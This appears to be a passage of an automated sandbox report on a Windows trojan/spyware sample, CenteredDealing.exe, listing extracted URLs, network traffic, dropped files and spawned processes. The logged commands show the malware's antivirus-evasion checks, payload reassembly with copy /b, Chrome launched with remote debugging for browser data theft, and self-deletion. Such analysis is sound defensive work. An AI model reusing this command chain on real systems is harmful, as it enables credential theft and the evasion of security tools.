    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
    Source: chrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002487571.000064DC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002633212.000064DC0141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002568886.000064DC01414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
    Source: chrome.exe, 00000011.00000003.2004385403.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
    Source: chrome.exe, 00000011.00000003.2014917716.000064DC01B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981174895.000064DC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
    Source: chrome.exe, 00000011.00000003.1981174895.000064DC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
    Source: chrome.exe, 00000011.00000003.2014917716.000064DC01B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981174895.000064DC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000011.00000003.1981174895.000064DC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
    Source: chrome.exe, 00000011.00000003.2014917716.000064DC01B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981174895.000064DC009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
    Source: chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
    Source: chromecache_90.19.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_87.19.drString found in binary or memory: https://plus.google.com
    Source: chromecache_87.19.drString found in binary or memory: https://plus.googleapis.com
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: chrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002487571.000064DC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002633212.000064DC0141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002568886.000064DC01414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
    Source: jwt26x.12.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
    Source: jwt26x.12.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
    Source: jwt26x.12.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
    Source: jwt26x.12.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
    Source: chromecache_87.19.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
    Source: 6fcjw4.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: 26pzcb.12.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: 6fcjw4.12.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
    Source: Cartoons.8.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: chrome.exe, 00000011.00000003.1981685293.000064DC00CDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: 26pzcb.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002487571.000064DC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002633212.000064DC0141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002568886.000064DC01414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chromecache_87.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
    Source: chromecache_87.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
    Source: chrome.exe, 00000011.00000003.2011271929.000064DC01750000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011363316.000064DC01758000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011091198.000064DC01738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011447147.000064DC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011318136.000064DC01754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011174614.000064DC01748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011524797.000064DC01774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011484225.000064DC01770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011403579.000064DC0175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2011225414.000064DC0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000011.00000003.2011403579.000064DC0175C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerd
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000011.00000003.1992121284.000064DC00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chromecache_90.19.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
    Source: chromecache_90.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
    Source: chromecache_90.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2003449524.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
    Source: chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
    Source: chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\CruisesReggaeJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\JjFeatureJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\BlastEnteredJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\MontrealTeethJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\FtReleasesJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\DildoWitnessesJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\GospelNeighborsJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\ControlledCruiseJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\WellDepartmentJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004074BB0_2_004074BB
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: String function: 004062A3 appears 57 times
    Source: CenteredDealing.exeStatic PE information: invalid certificate
    Source: CenteredDealing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@47/48@11/7
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\InteractiveJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Users\user\AppData\Local\Temp\nsg6BC6.tmpJump to behavior
    Source: CenteredDealing.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: s0rqq9zm7.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile read: C:\Users\user\Desktop\CenteredDealing.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\CenteredDealing.exe "C:\Users\user\Desktop\CenteredDealing.exe"
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Dodge
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com d
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2480,i,18006708622836409886,5540155705252111612,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8y5fk" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DodgeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture Jump to behavior
